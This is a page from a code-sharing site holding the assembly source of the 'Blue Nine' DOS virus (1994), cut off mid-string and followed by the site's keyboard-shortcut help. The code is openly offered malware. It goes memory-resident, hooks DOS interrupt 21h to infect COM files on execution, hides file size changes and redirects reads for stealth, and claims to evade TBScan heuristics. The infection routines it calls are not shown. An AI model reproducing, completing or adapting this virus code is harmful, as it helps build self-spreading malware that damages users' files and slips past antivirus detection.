📄 bluenine.asm
字号:
; The Blue Nine virus... (c) 94 Conzouler
; Resident in conventional memory
; Com infection on load and execute
; Com infection on 11/12 (dir for short - TU)
; Size stealth on 11/12
; Size stealth on 4E/4F
; Infection check: seconds=4
; Installation check: get dos version with cx=666
; Redirection stealth on 3D/3F
; No TBScan flags (by hard heuristic as per version 6.26 - TU)
.model tiny
.code
org 100h
parasize equ ((offset virend - offset start) / 10h) + 1
bytesize equ parasize*10h
Start:
db 0E9h ; Near jmp to ResCheck
dw 03h
HostStartO db 0CDh ; Buffer to save hosthead
HostStartA dw 09020h ; int20 + nop
ResCheck:
push ax
; Perform installation check
mov ah, 30h
mov cx, 666
int 21h ; Dos would set cx to 0
cmp cx, 444 ; but virus will set to 444
je RestoreHost ; if resident
cmp al, 03h ; Don't go resident
jb RestoreHost ; If dosver less than 3.00
Install:
; Code to place virus in memory
mov bx, es ; Dec es to get MCB
dec bx
mov es, bx
mov bx, es:[3] ; Get size of MB and dec it
push cs
pop es
sub bx, parasize+2
mov ah, 4Ah
int 21h
mov ah, 48h ; Allocate MB to virus
mov bx, parasize+1
int 21h
dec ax ; Put MCB in es:0
mov es, ax
mov word ptr es:[1], 08 ; Change owner to system
push word ptr ds:[101h] ; Get delta offset
pop si
add si, 103h ; Get jmp pos
mov di, 16h ; Move virus to new block
mov cx, bytesize-6
rep movsb
sub ax, 0Fh ; Jmp to new block
push ax
mov ax, offset InstVec
push ax
retf
Org21:
db 0EAh ; Far abs jmp
o21 label
Org21ofs dw ?
Org21seg dw ?
InstVec:
; Code to install virus in vector21
mov ax, 3521h ; Save org21
int 21h
mov cs:Org21ofs, bx
mov bx, es
mov cs:Org21seg, bx
mov ax, 2125h ; Set Vector21
xchg ah, al
push ds
push cs
pop ds
mov dx, offset Vector21
int 21h
pop ds
RestoreHost:
mov si, ds:[101h] ; Get addr from jmp opc
add si, 100h ; addr to hoststarto
mov ah, ds:[si] ; Restore hosthead
mov ds:[100h], ah
inc si
mov ax, ds:[si]
mov ds:[101h], ax
pop ax
push ds ; Set es to host cs
pop es
push ds ; Save host address
mov bx, 100h
push bx
retf
icheck: ; Installation check
cmp cx, 666
jne Org21
mov cx, 444
retf 2
Vector21:
cmp ah, 30h ; Installation check?
jne chn1
jmp icheck
chn1: cmp ax, 4B00h ; Load and execute?
jne chn2
call cominfect
chn2: cmp ah, 11h ; find first/next (fcb)?
je fff
cmp ah, 12h
jne chn3
fff: call dos
cmp al, 0FFh
je chn3
jmp fcbsearch
chn3: cmp ah, 4Eh ; find first handle?
jne chn4
call dos
jnc found
retf 2
chn4: cmp ah, 4Fh ; find next handle?
jne chn5
call dos
jnc found
retf 2
found: jmp hdlsearch
chn5: cmp ah, 3Dh ; open handle?
jne chn6
call dos
jnc opened
retf 2
opened: jmp hdlopen
chn6: cmp ah, 3Fh ; read from handle
jne chnx
jmp hdlread
chnx: jmp Org21 ; Chain to dos
db ' ⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -